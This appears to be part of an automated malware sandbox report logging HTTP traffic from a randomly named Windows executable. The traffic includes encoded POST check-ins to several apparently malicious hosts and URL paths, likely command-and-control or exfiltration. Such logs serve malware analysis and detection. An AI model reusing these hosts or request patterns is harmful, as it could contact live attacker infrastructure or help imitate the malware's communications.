                                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 4a 55 4d 72 70 7a 53 30 4a 53 6f 33 6b 44 48 47 53 64 2f 78 69 37 31 52 44 66 6d 34 37 4d 2b 42 79 59 4f 71 6a 7a 6a 50 57 49 63 44 4f 53 71 78 46 6a 36 39 45 76 6e 4e 6e 69 55 52 46 79 7a 65 2b 65 61 57 55 39 58 72 4b 5a 6f 75 70 56 4b 58 55 45 30 53 56 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_JUMrpzS0JSo3kDHGSd/xi71RDfm47M+ByYOqjzjPWIcDOSqxFj69EvnNniURFyze+eaWU9XrKZoupVKXUE0SVA==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:35.772012949 CEST554INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMWZjODdjOWQtZTFlNy00MGE2LWE1Y2MtZDJkMzIwY2MxZWNlIiwicGFnZV90aW1lIjoxNzI4NDczOTc1LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              36192.168.11.2049777199.59.243.22780900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.291410923 CEST558OUTGET /enra/?9B6h=EuJScojaXV9tkcwMAt8AIq1Fa6SjC3UOd2jPPlI8uN15nuMsourZ6RQE0C5sWIKd2oJ0ti0mlaCO+WC8VNvzQxVxe8Bdx85A43xT3KZq/wlYnQ9EpMMmNcQ=&FlS=3ldH5dkH-dBLf HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.foundation-repair.biz
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.392899990 CEST1289INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                              date: Wed, 09 Oct 2024 11:39:37 GMT
                                                                                                                                                                                                                                                              content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                              content-length: 1486
                                                                                                                                                                                                                                                              x-request-id: 36edc8d3-c331-457b-81e5-d6bff0cbd24f
                                                                                                                                                                                                                                                              cache-control: no-store, max-age=0
                                                                                                                                                                                                                                                              accept-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              critical-ch: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              vary: sec-ch-prefers-color-scheme
                                                                                                                                                                                                                                                              x-adblock-key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sdEb7As6bGPjy7ij6cYyZHF0PALriXfmYgO9BnyQs+FcGK2R9jqaqAM/RJwkctNdgoiRZoVsljps3wlOYZu94A==
                                                                                                                                                                                                                                                              set-cookie: parking_session=36edc8d3-c331-457b-81e5-d6bff0cbd24f; expires=Wed, 09 Oct 2024 11:54:38 GMT; path=/
                                                                                                                                                                                                                                                              connection: close
                                                                                                                                                                                                                                                              Data Raw: 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 64 61 74 61 2d 61 64 62 6c 6f 63 6b 6b 65 79 3d 22 4d 46 77 77 44 51 59 4a 4b 6f 5a 49 68 76 63 4e 41 51 45 42 42 51 41 44 53 77 41 77 53 41 4a 42 41 4e 44 72 70 32 6c 7a 37 41 4f 6d 41 44 61 4e 38 74 41 35 30 4c 73 57 63 6a 4c 46 79 51 46 63 62 2f 50 32 54 78 63 35 38 6f 59 4f 65 49 4c 62 33 76 42 77 37 4a 36 66 34 70 61 6d 6b 41 51 56 53 51 75 71 59 73 4b 78 33 59 7a 64 55 48 43 76 62 56 5a 76 46 55 73 43 41 77 45 41 41 51 3d 3d 5f 73 64 45 62 37 41 73 36 62 47 50 6a 79 37 69 6a 36 63 59 79 5a 48 46 30 50 41 4c 72 69 58 66 6d 59 67 4f 39 42 6e 79 51 73 2b 46 63 47 4b 32 52 39 6a 71 61 71 41 4d 2f 52 4a 77 6b 63 74 4e 64 67 6f 69 52 5a 6f 56 73 6c 6a 70 73 33 77 6c 4f 59 5a 75 39 34 41 3d 3d 22 20 6c 61 6e 67 3d 22 65 6e 22 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 42 32 42 32 42 3b 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <!doctype html><html data-adblockkey="MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBANDrp2lz7AOmADaN8tA50LsWcjLFyQFcb/P2Txc58oYOeILb3vBw7J6f4pamkAQVSQuqYsKx3YzdUHCvbVZvFUsCAwEAAQ==_sdEb7As6bGPjy7ij6cYyZHF0PALriXfmYgO9BnyQs+FcGK2R9jqaqAM/RJwkctNdgoiRZoVsljps3wlOYZu94A==" lang="en" style="background: #2B2B2B;"><head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <link rel="icon" href="data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAIAAACQd1PeAAAADElEQVQI12P4//8/AAX+Av7czFnnAAAAAElFTkSuQmCC"> <link rel="preconnect" href="https://www.google
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:38.392998934 CEST886INData Raw: 2e 63 6f 6d 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 69 64 3d 22 74 61 72 67 65 74 22 20 73 74 79 6c 65 3d 22 6f 70 61 63 69 74 79 3a 20 30 22 3e 3c 2f 64 69 76 3e 0a 3c 73 63 72 69
                                                                                                                                                                                                                                                              Data Ascii: .com" crossorigin></head><body><div id="target" style="opacity: 0"></div><script>window.park = "eyJ1dWlkIjoiMzZlZGM4ZDMtYzMzMS00NTdiLTgxZTUtZDZiZmYwY2JkMjRmIiwicGFnZV90aW1lIjoxNzI4NDczOTc4LCJwYWdlX3VybCI6Imh0dHA6Ly93d3cuZm91bmRhdGlvbi1yZXB


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              37192.168.11.204977885.159.66.9380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:44.165530920 CEST832OUTPOST /c0kl/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.emeluzunmoda.online/c0kl/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 4e 7a 78 78 32 36 35 5a 71 44 48 79 70 50 50 35 43 34 66 36 4e 68 74 43 45 36 78 53 32 78 37 30 41 32 42 62 7a 4b 6d 36 31 59 73 53 35 76 4e 7a 78 68 31 42 77 64 47 2f 4e 76 50 44 4d 68 50 66 6d 65 35 4b 39 74 6c 6c 71 73 66 49 34 62 56 70 70 6b 38 34 6d 73 44 35 6f 42 7a 6d 53 62 56 6b 76 44 69 52 6f 75 4d 53 51 68 6e 43 6e 6e 78 6c 6b 73 5a 56 30 74 61 4e 34 6d 6b 4a 42 39 43 54 32 59 4a 76 47 74 34 31 47 49 4d 36 39 41 68 68 59 59 4d 37 4f 34 65 4a 5a 38 79 2b 49 70 36 74 30 32 76 53 47 63 50 4f 50 78 37 6b 51 66 2b 73 63 65 53 6b 4d 41 77 2b 2f 72 74 54 58 4f 5a 73 6a 67 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Nzxx265ZqDHypPP5C4f6NhtCE6xS2x70A2BbzKm61YsS5vNzxh1BwdG/NvPDMhPfme5K9tllqsfI4bVppk84msD5oBzmSbVkvDiRouMSQhnCnnxlksZV0taN4mkJB9CT2YJvGt41GIM69AhhYYM7O4eJZ8y+Ip6t02vSGcPOPx7kQf+sceSkMAw+/rtTXOZsjg==


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              38192.168.11.204977985.159.66.9380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:46.909287930 CEST852OUTPOST /c0kl/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 221
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.emeluzunmoda.online/c0kl/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 4e 7a 78 78 32 36 35 5a 71 44 48 79 6f 76 2f 35 41 66 4c 36 63 52 74 46 4b 61 78 53 35 52 37 77 41 32 46 62 7a 4c 53 51 31 72 59 53 35 4f 52 7a 77 67 31 42 7a 64 47 2f 46 50 50 4d 49 68 50 49 6d 5a 78 30 39 6f 64 6c 71 73 4c 49 34 66 64 70 70 54 6f 2f 33 73 44 2f 69 52 7a 6f 57 62 56 6b 76 44 69 52 6f 75 59 30 51 68 2f 43 6e 57 42 6c 6b 4a 74 53 36 4e 61 4b 78 47 6b 4a 58 4e 43 58 32 59 49 4b 47 70 59 54 47 4b 45 36 39 42 52 68 59 4a 4d 36 64 59 66 43 47 73 7a 78 4a 70 6a 30 37 53 57 6b 47 2f 2f 69 4c 30 72 6e 63 70 76 32 42 73 6d 41 50 54 73 4d 37 62 55 37 56 4d 59 33 2b 71 36 73 62 4f 4b 32 67 5a 56 33 6c 54 48 39 75 79 4c 39 41 48 55 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Nzxx265ZqDHyov/5AfL6cRtFKaxS5R7wA2FbzLSQ1rYS5ORzwg1BzdG/FPPMIhPImZx09odlqsLI4fdppTo/3sD/iRzoWbVkvDiRouY0Qh/CnWBlkJtS6NaKxGkJXNCX2YIKGpYTGKE69BRhYJM6dYfCGszxJpj07SWkG//iL0rncpv2BsmAPTsM7bU7VMY3+q6sbOK2gZV3lTH9uyL9AHU=


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              39192.168.11.204978085.159.66.9380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.658235073 CEST2578OUTPOST /c0kl/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 7369
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.emeluzunmoda.online/c0kl/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 4e 7a 78 78 32 36 35 5a 71 44 48 79 6f 76 2f 35 41 66 4c 36 63 52 74 46 4b 61 78 53 35 52 37 77 41 32 46 62 7a 4c 53 51 31 72 41 53 34 38 31 7a 77 44 64 42 79 64 47 2f 50 76 50 50 49 68 50 4a 6d 66 5a 4f 39 6f 68 66 71 76 7a 49 35 39 46 70 68 42 51 2f 75 38 44 2f 71 78 7a 70 53 62 56 4c 76 44 79 64 6f 75 49 30 51 68 2f 43 6e 56 5a 6c 6d 63 5a 53 34 4e 61 4e 34 6d 6b 56 42 39 43 2f 32 59 52 33 47 6f 5a 6f 46 36 6b 36 39 68 42 68 61 2f 51 36 65 34 66 41 46 73 79 75 4a 70 66 52 37 53 6a 62 47 2b 62 49 4c 7a 33 6e 4d 6f 48 75 55 4f 4f 6e 53 54 6f 73 6b 61 41 55 58 61 41 70 77 74 6a 56 58 50 58 57 6e 70 52 51 73 6a 50 38 78 79 2f 63 54 52 72 73 46 6b 68 36 2b 63 42 52 78 45 77 4a 31 53 77 6d 57 54 35 4e 66 69 69 65 44 71 4a 41 6e 47 37 35 44 7a 54 79 4a 74 59 39 68 34 53 74 6f 69 4c 65 53 2b 4b 73 4f 72 4e 46 57 74 45 57 35 35 4c 4a 45 50 7a 6d 39 2b 4f 68 65 74 77 62 45 64 6a 6b 30 51 46 6e 43 7a 39 5a 63 39 44 77 48 68 48 67 33 7a 62 74 46 76 4e 54 59 30 59 5a 76 73 5a 43 2b 31 55 31 75 [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=Nzxx265ZqDHyov/5AfL6cRtFKaxS5R7wA2FbzLSQ1rAS481zwDdBydG/PvPPIhPJmfZO9ohfqvzI59FphBQ/u8D/qxzpSbVLvDydouI0Qh/CnVZlmcZS4NaN4mkVB9C/2YR3GoZoF6k69hBha/Q6e4fAFsyuJpfR7SjbG+bILz3nMoHuUOOnSToskaAUXaApwtjVXPXWnpRQsjP8xy/cTRrsFkh6+cBRxEwJ1SwmWT5NfiieDqJAnG75DzTyJtY9h4StoiLeS+KsOrNFWtEW55LJEPzm9+OhetwbEdjk0QFnCz9Zc9DwHhHg3zbtFvNTY0YZvsZC+1U1uM1Pb2lm5Kxr3TdJEl1yjmRnjhFms62N7FjoX/tMJ3fFvrdWa9ruRIuAi29eQLL4c7L0Ti8nB7KrDQmSYFNxzTJ+NjaTsRd6ndpTOqJEVH/sU6dgJ+vydIeYfFtKXiYtJlRlWKvnUUgI4L+HG4rAdDnIoTxL7V5M5MqVV0c4V8Sjh2SelHScJ7D6gsIVXLB503FnxGpiwJVtdp/8Tz0+eklaob4p5QMza18yx5aUYb+gQPOrYhiuQP9r68U1YIJi5fM6lsnsPDKrhUwHlaaDs0u4PE4pmOMbc1zXmMLTGmCYrqlgGtVL7ttGa9A8cLCaokkCbsNo865IqAD5/aW1RSkoNV4wk8DLxd0OVJkS6uyjpoMXCVMxpMuvq0BU+BnfBNNImvlLnv302xwgcUqYG6Nl/JUpvuY5LMNsm7tvCRl+QsIQhHIDiJzRO8An+cSvaSIMbUKfGDMGGTgkKNxejTs0MN71NVLcOtC3rECh4KTH6QbEEC0hu3DydUel2PoN1er2Lz6U55PDJQo13sZ7FQhRieGakWWxeS3PNIySWjqsLMHuulQePFTfLlxV50a01BWi0D8unli2YUp2U9wTPB5/+4kiRKjijJDkCFWJYYIN+JOihJrbmMXT5HVAUfgdbeI6hvQ5aOBUaBD8t5ObNQVizpas1kgwtJb [TRUNCATED]
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:49.658308983 CEST5423OUTData Raw: 30 67 6c 50 74 55 4f 4f 51 44 4b 64 31 69 55 5a 31 38 48 53 39 52 43 76 38 6f 76 67 6f 74 6f 57 74 6e 4d 6c 50 56 46 47 41 65 48 4c 56 34 5a 4c 38 50 35 76 41 70 73 78 2f 61 67 5a 6c 2f 77 72 51 38 34 41 47 50 72 6c 7a 52 45 78 6c 69 63 39 4f 50
                                                                                                                                                                                                                                                              Data Ascii: 0glPtUOOQDKd1iUZ18HS9RCv8ovgotoWtnMlPVFGAeHLV4ZL8P5vApsx/agZl/wrQ84AGPrlzRExlic9OPFs2oQb/lky5yyJh0+zV4pCn//yWSTbfph/OBCDzKZ0T6DJyJsdNhu95NoMc3dty9+zBBB0t60nolTvOjq9xZtd9NkPj/3+09Q9psddPnRk33V5rdp7r3YrHkgu6zlEn09yPvwZEp1j4L5yjMKyfcxqBe+cNjj8iMR


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              40192.168.11.204978185.159.66.9380900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.406431913 CEST556OUTGET /c0kl/?FlS=3ldH5dkH-dBLf&9B6h=AxZR1MxN1yP04/KkfJjqNmRSK4d8g2rgChYpgYbN8LwS/ds0321h0MeEKpKCay63h/JFzZR/nOfV69IulQUTnqrvqwrwGbRyvD357dhiEinhnUxdss5AyLg= HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.emeluzunmoda.online
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:52.620397091 CEST225INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: nginx/1.14.1
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:52 GMT
                                                                                                                                                                                                                                                              Content-Length: 0
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              X-Rate-Limit-Limit: 5s
                                                                                                                                                                                                                                                              X-Rate-Limit-Remaining: 19
                                                                                                                                                                                                                                                              X-Rate-Limit-Reset: 2024-10-09T11:39:57.5130416Z


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                              41192.168.11.2049782176.57.64.10280900C:\Program Files (x86)\bBBEDGxbsFujobSrVfqaXPbCZeVtcVUsWtjqXlqHIZJbcmiAdmywdanXpAaKnxdtLmiWsH\aypAdCUEzlG.exe
                                                                                                                                                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.115968943 CEST814OUTPOST /mktg/ HTTP/1.1
                                                                                                                                                                                                                                                              Host: www.ayypromo.shop
                                                                                                                                                                                                                                                              Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                              Accept-Language: en-us
                                                                                                                                                                                                                                                              Origin: http://www.ayypromo.shop
                                                                                                                                                                                                                                                              Cache-Control: no-cache
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Content-Length: 201
                                                                                                                                                                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                              Referer: http://www.ayypromo.shop/mktg/
                                                                                                                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                                                                                                                                                                                                                              Data Raw: 39 42 36 68 3d 35 52 79 46 73 36 2f 65 6a 6a 55 6f 55 6e 49 75 64 63 39 47 61 69 6e 74 34 46 70 67 67 4a 59 6e 64 34 4d 76 59 49 54 37 78 63 72 63 66 6e 55 69 41 43 68 51 46 49 35 49 61 58 73 38 53 6d 61 42 6f 43 51 78 51 2b 68 51 31 45 59 62 62 53 42 4b 41 48 4b 48 54 34 6b 54 67 63 53 46 67 31 44 2f 74 45 6e 4a 43 37 4e 72 66 4b 33 6c 6b 70 58 4d 68 30 30 50 38 4b 78 33 64 42 4c 63 72 55 2b 46 64 44 54 43 46 69 39 6c 48 78 38 48 4f 72 63 6a 4c 35 6f 36 58 32 72 33 53 57 61 79 4f 6b 43 2f 62 34 38 4b 76 61 68 6e 73 41 41 70 64 46 37 72 37 2f 69 36 69 4f 66 43 54 6a 7a 56 49 73 39 35 7a 67 3d 3d
                                                                                                                                                                                                                                                              Data Ascii: 9B6h=5RyFs6/ejjUoUnIudc9Gaint4FpggJYnd4MvYIT7xcrcfnUiAChQFI5IaXs8SmaBoCQxQ+hQ1EYbbSBKAHKHT4kTgcSFg1D/tEnJC7NrfK3lkpXMh00P8Kx3dBLcrU+FdDTCFi9lHx8HOrcjL5o6X2r3SWayOkC/b48KvahnsAApdF7r7/i6iOfCTjzVIs95zg==
                                                                                                                                                                                                                                                              Oct 9, 2024 13:39:58.385385990 CEST1066INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                              Server: ddos-guard
                                                                                                                                                                                                                                                              Connection: close
                                                                                                                                                                                                                                                              Set-Cookie: __ddg8_=ep8vbQ2A7sjFh3el; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg9_=191.96.150.187; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg10_=1728473998; Domain=.ayypromo.shop; Path=/; Expires=Wed, 09-Oct-2024 11:59:58 GMT
                                                                                                                                                                                                                                                              Set-Cookie: __ddg1_=dVDZzNIF1y2HLqrrm2Ip; Domain=.ayypromo.shop; HttpOnly; Path=/; Expires=Thu, 09-Oct-2025 11:39:58 GMT
                                                                                                                                                                                                                                                              Date: Wed, 09 Oct 2024 11:39:57 GMT
                                                                                                                                                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                              Content-Length: 340
                                                                                                                                                                                                                                                              Last-Modified: Tue, 29 May 2018 17:41:27 GMT
                                                                                                                                                                                                                                                              ETag: "154-56d5bbe607fc0"
                                                                                                                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                                                                                                                              X-Frame-Options: SAMEORIGIN
                                                                                                                                                                                                                                                              Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 22 3e 3c 74 69 74 6c 65 3e 54 69 6c 64 61 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 65 65 65 3b 22 3e 3c 74 61 62 6c 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 31 30 30 25 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 22 3e 3c 74 72 3e 3c 74 64 20 73 74 79 6c 65 3d 22 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 6d 69 64 64 6c 65 3b 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 22 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 74 69 6c 64 61 2e 63 63 22 3e 3c 69 6d 67 20 73 72 63 3d 22 2f 2f 74 69 6c 64 61 2e 77 73 2f 69 6d 67 2f 6c 6f 67 6f 34 30 34 2e 70 6e 67 22 20 62 6f 72 64 65 72 3d 22 30 22 20 61 6c 74 3d 22 54 69 6c 64 61 22 20 2f 3e 3c 2f 61 3e 3c 2f 74 64 3e 3c 2f 74 72 3e 3c 2f 74 61 62 6c 65 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d [TRUNCATED]
                                                                                                                                                                                                                                                              Data Ascii: <html><head><meta name="robots" content="noindex"><title>Tilda</title></head><body style="background-color:#eee;"><table style="width:100%; height:100%;"><tr><td style="vertical-align: middle; text-align: center;"><a href="https://tilda.cc"><img src="//tilda.ws/img/logo404.png" border="0" alt="Tilda" /></a></td></tr></table></body></html>


                                                                                                                                                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
